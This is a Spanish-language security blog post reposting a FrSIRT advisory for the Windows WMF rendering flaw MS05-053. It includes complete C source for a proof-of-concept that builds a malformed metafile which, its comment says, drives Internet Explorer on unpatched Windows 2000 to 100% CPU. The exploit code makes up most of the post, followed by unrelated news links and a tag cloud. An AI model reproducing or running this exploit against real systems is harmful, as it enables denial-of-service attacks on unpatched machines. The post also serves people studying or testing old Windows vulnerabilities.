Exploit Microsoft Windows Metafile (WMF) Image Handling Remote (MS05-053)


Frsirt.com ha publicado el exploit para la vulnerabilidada MS05-053 (Vulnerabilities in Graphics Rendering Engine Could Allow Code Execution (896424) del cual informo microsoft el día 8/11/2005.





Se ha detectado un problema de seguridad relacionado con la ejecución de código remoto en el motor de representación de gráficos que podría permitir a un usuario malintencionado poner en peligro de forma remota un sistema basado en Windows y hacerse con el control del mismo.

Referencia vulnerabilidad

http://www.microsoft.com/technet/security/bulletin/ms05-053.mspx

Advisory ID : FrSIRT/ADV-2005-2348
Rated as : Critical
Note : Proof of concept exploit (DoS)

/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile from this code when viewed in internet explorer raises the CPU
* utilization to 100%. The code was tested on Windows 2000 server SP4. The issue does
* not occur with the hotfix for GDI (MS05-053) installed
*
* Disclaimer: This code is for educational/testing purposes by authosized persons on
* networks/systems setup for such a purpose.The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/

#include <stdio.h>

unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00"
"\xff\xff\xff\xff" //Largest record size
"\x00\x00";

unsigned char MetafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff\xff\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03";

unsigned char wmfeof[] =
"\x00\x00\x00\x00";

int main(int argc, char *argv[])
{
FILE *fp;
char wmfbuf[1024];
int metafilesize, metafilesizeW, i, j;

metafilesize = sizeof (wmfheader) + sizeof (MetafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesizeW, 4);

printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
}

printf("[*] Adding Metafile records\n");
for (j = i, i = 0; i < sizeof(MetafileRECORD) -1; i++, j++) {
wmfbuf[j] = MetafileRECORD[i];
}

printf("[*] Adding EOF record\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];
}

printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp);
}

Fuente:
frsirt.com



Otras noticias de interés:

Nueve de cada diez vulnerabilidades de Windows 7 se mitigan al desactivar los privilegios de administrador
BeyondTrust ha hecho público un estudio que revela que al desactivar los privilegios de administrador en Windows 7, se eliminan cerca del 90% de vulnerabilidades críticas detectadas en este sistema operativo....
Windows XP infiltrado por Al-Qaeda ?
Durante interrogatorios realizados por la policía india, un supuesto miembro de la red terrorista Al-Qaeda advirtió que la organización ha infiltrado a Microsoft, instalando una puerta trasera secreta en Windows XP. ...
Ayuda a la Asociación de Internautas
Como sabrás, la Asociación de Internautas ha sido condenada por intromisión en el honor de la SGAE y de don Eduardo Bautista a consecuencia de haber alojado los contenidos de la Plataforma de movilizaciones contra la SGAE....
Dile NO OOXML!!!
Entérese de todos los aspectos por los que Venezuela y el resto del mundo debe votar NO al OOXML:...
Seguridad en Tablets y Smartphones
Actualmente utilizamos a diario una gran variedad de dispositivos móviles, de los cuáles los más populares son, sin duda alguna, los smartphones y las tablets. Su portabilidad y reducido tamaño unido a que nos permiten realizar una gran variedad ...
Con Chrome conoce quienes apoyan la SOPA
Tony Webster a creado una aplicación que te podrá indicar que empresas (son más de las listadas anteriormente) que estan apoyando a la absurda Ley SOPA....
INDETENIBLE Y DESBORDANTE SERÁ LA ZONA DESCARGA BELMONT 2003
Un circuito con las más excitantes actividades playeras, atracciones interactivas y las principales bandas musicales del momento, serán los ingredientes perfectos para descargar, gozar y vibrar entre amigos, en el evento más esper...
Nace el Linux Desktop Consortium para impulsar el uso del software libre
El uso generalizado de Linux en el ordenador de sobremesa todavía no ha llegado muy lejos. Por ello un nuevo grupo, el Linux Desktop Consortium, ha sido creado por un creciente número de fabricantes de Linux y aplicaciones para promover el uso del ...
Easy Ubuntu: un Ubuntu con esteroides
Tu vecin@/herman@/amig@/ ha instalado Ubuntu, alejándose del lado oscuro ;-) ¿ya está? No, te llamará en breve, pidiéndote el plugin de Flash, el de RealAudio?, los drivers de su tarjeta gráfica, .......
Vulnerabilidad en smartphones Android de HTC
Expertos en seguridad han alertado a los usuarios de terminales fabricados por HTC y gobernados por Android de una vulnerabilidad grave que podría estar poniendo en serio peligro la privacidad de datos personales como nombres, dirección de email, i...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • handling
  • hosting
  • image
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • metafile
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • remote
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • wmf
  • xanadu
  • xfce
  • xombra